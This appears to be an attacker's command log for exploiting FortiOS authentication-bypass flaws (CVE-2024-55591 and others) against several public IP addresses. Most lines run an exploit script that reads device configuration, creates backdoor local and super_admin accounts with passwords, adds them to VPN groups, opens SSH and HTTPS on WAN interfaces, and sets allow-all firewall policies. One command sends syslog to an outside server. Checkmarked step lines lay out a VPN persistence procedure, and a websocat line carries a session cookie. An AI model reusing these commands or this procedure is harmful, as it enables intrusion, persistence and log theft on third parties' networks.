https://github.com/sysirq/fortios-auth-bypass-exploit-CVE-2024-55591 https://www.exploit-db.com/exploits/51092 d$i4@OgDIGfL websocat.x86_64-pc-windows-gnu.exe -n -H "Cookie: ccsrftoken=07F74E08CA3545FD9BD40FA4CA695C04 wss://119.160.105.84 https://cve.komodosec.com/cve?id=CVE-2023-28813 https://github.com/h4x0r-dz/CVE-2024-21762 https://cve.komodosec.com python exploit.py --host 125.209.110.82 --port 443 --command "diagnose vpn ssl vpn-session list" --user watchTowr --ssl python exploit.py --host 175.107.254.64 --port 443 --command "config system interface" --user watchTowr --ssl python exploit_new.py --host 175.107.254.64 --port 443 --user watchTowr --ssl python exploit.py --host 175.107.32.115 --port 443 --command "show vpn ssl settings" --user watchTowr --ssl python exploit.py --host 103.137.25.158 --port 443 --command "show vpn ssl settings" --user watchTowr --ssl python exploit.py --host 175.107.14.199 --port 443 --command "show vpn ssl settings" --user watchTowr --ssl python exploit.py --host 175.107.32.115 --port 443 --command "show vpn ssl web user-group-bookmark" --user watchTowr --ssl python exploit.py --host 175.107.14.199 --port 443 --command "config user local; edit hrdc-admin; set password Gsp@2024Secure!; next; end" --user watchTowr --ssl python exploit.py --host 175.107.14.199 --port 443 --command "config user local`nedit labfirst`nset type password`nset passwd Qwerty@12345`nnext`nend" --user watchTowr --ssl python exploit.py --host 175.107.14.199 --port 443 --command "config user local`nedit labfirst`nset type password`nset passwd Qwerty@12345`nnext`nend" --user watchTowr --ssl python exploit.py --host 175.107.14.199 --port 443 --command "config user group`nedit Guest-group`nset member labfirst`nnext`nend" --user watchTowr --ssl python exploit.py --host 175.107.14.199 --port 443 --command "config user group`nedit gspvpn`nappend member azeem`nnext`nend" --user watchTowr --ssl python exploit.py --host 209.150.144.42 --port 443 --command "config user local`nedit azeem`nset type password`nset passwd Qwerty@123456789`nnext`nend" --user watchTowr --ssl python exploit.py --host 58.27.209.178 --port 443 --command "config user local`nedit labfirst`nset passwd qazQAZ123!@#`nnext`nend" --user watchTowr --ssl python exploit.py --host 175.107.14.199 --port 443 --command "config user local`nedit labfirst`nset service ssh`nnext`nend" --user watchTowr --ssl python exploit.py --host 175.107.14.199 --port 443 --command "config user local`nedit labfirst`nset passwd qazQAZ123!@#`nnext`nend" --user watchTowr --ssl 209.150.144.42 edit Guest-group set member labfirst next end python exploit.py --host 175.107.14.199 --port 443 --command "show user group gspvpn" --user watchTowr --ssl python exploit.py --host 175.107.14.199 --port 443 --command "show vpn ssl settings" --user watchTowr --ssl python exploit.py --host 175.107.14.199 --port 443 --command "show firewall policy" --user watchTowr --ssl python exploit.py --host 175.107.14.199 --port 443 --command "config vpn ssl settings" --user watchTowr --ssl python exploit.py --host 175.107.14.199 --port 443 --command "config vpn ssl settings" --user watchTowr --ssl config system interface edit wan1 set allowaccess ping https ssh next end python exploit.py --host 175.107.14.199 --port 443 --command "config system interface`nedit wan1`nset allowaccess ping https ssh`nnext`nend" --user watchTowr --ssl python exploit.py --host 175.107.14.199 --port 443 --command "config system interface`nedit wan1`nset allowaccess ping https ssh`nset passwd Qwerty@12345`nnext`nend" --user watchTowr --ssl python exploit.py --host 175.107.14.199 --port 443 --command "config firewall policy`nedit 5`nset name `"SSL-VPN 1`"`nset srcintf `"ssl.root`"`nset dstintf `"internal2`"`nset srcaddr `"SSLVPN_TUNNEL_ADDR1`"`nset dstaddr `"all`"`nset action accept`nset schedule `"always`"`nset service `"ALL`"`nset groups `"gspvpn`"`nset nat disable`nnext`nend" --user watchTowr --ssl ✅ Step 1: Create Local User labfirst ✅ Step 2: Add labfirst to Group gspvpn python exploit.py --host 175.107.14.199 --port 443 --command "config user group`nedit gspvpn`nappend member labfirst`nnext`nend" --user watchTowr --ssl ✅ Step 3: Configure Portal full-access for Tunnel Mode python exploit.py --host 175.107.14.199 --port 443 --command "config vpn ssl web portal`nedit full-access`nset tunnel-mode enable`nset web-mode disable`nset ip-pools \"SSLVPN_TUNNEL_ADDR1\"`nset split-tunneling disable`nnext`nend" --user watchTowr --ssl ✅ Step 4: Map Group gspvpn to Portal python exploit.py --host 175.107.14.199 --port 443 --command "config vpn ssl settings`nconfig authentication-rule`nedit 1`nset groups gspvpn`nset portal full-access`nnext`nend" --user watchTowr --ssl ✅ Step 5: Create Firewall Policy to Allow VPN Access python exploit.py --host 175.107.14.199 --port 443 --command "config firewall policy`nedit 5`nset name \"SSL-VPN Access\"`nset srcintf \"ssl.root\"`nset dstintf \"internal2\"`nset srcaddr \"SSLVPN_TUNNEL_ADDR1\"`nset dstaddr \"all\"`nset action accept`nset schedule \"always\"`nset service \"ALL\"`nset groups \"gspvpn\"`nset nat enable`nnext`nend" --user watchTowr --ssl python exploit.py --host 175.107.14.199 --port 443 --command "config system interface`nedit wan2`nset allowaccess ping https ssh`nnext`nend; config user local`nedit labfirst`nset service ssh`nnext`nend" --user watchTowr --ssl python exploit.py --host 175.107.14.199 --port 443 --command "config system interface`nedit wan2`nset allowaccess ping https ssh`nnext`nend" --user watchTowr --ssl python exploit.py --host 175.107.32.115 --port 443 --command "config user local`nedit labfirst`nset service ssh`nnext`nend" --user watchTowr --ssl python exploit.py --host 103.137.25.158 --port 443 --command "config user local`nedit labfirst`nset service ssh`nnext`nend" --user watchTowr --ssl python exploit.py --host 202.154.245.211 --port 443 --command "config user local`nedit labfirst`nset passwd Qwerty@123456789`nnext`nend" --user watchTowr --ssl python exploit.py --host 202.154.245.211 --port 443 --command "config log syslogd setting`nset status enable`nset server 38.60.217.93`nset mode udp`nset port 514`nend" --user watchTowr --ssl python exploit.py --host 202.154.245.211 --port 443 --command "config log setting`nset log-auth enable`nend" --user watchTowr --ssl python exploit.py --host 175.107.14.199 --port 443 --command "config user supprt.local`nedit admin`nset type password`nset passwd StrongPassword123!`nnext`nend" --user watchTowr --ssl python exploit.py --host 202.154.245.211 --port 443 --command "config user group`nedit VPN_Users`nset member dmin`nnext`nend" --user watchTowr --ssl python exploit.py --host 58.27.184.195 --port 443 --command "config system admin`nedit support.local`nset password StrongPassword123!`nset accprofile super_admin`nset vdom root`nset remote-auth disable`nnext`nend" --user watchTowr --ssl python exploit.py --host 175.107.14.199 --port 443 --command "config system interface`nedit wan2`nset allowaccess ping https ssh`nnext`nend" --user watchTowr --ssl python exploit.py --host 175.107.14.199 --port 443 --command "get system interface" --user watchTowr --ssl config user local edit "dmin" set type password set passwd "StrongPassword123!" next end config user group edit "VPN_Users" set member "dmin" next end 202.154.245.211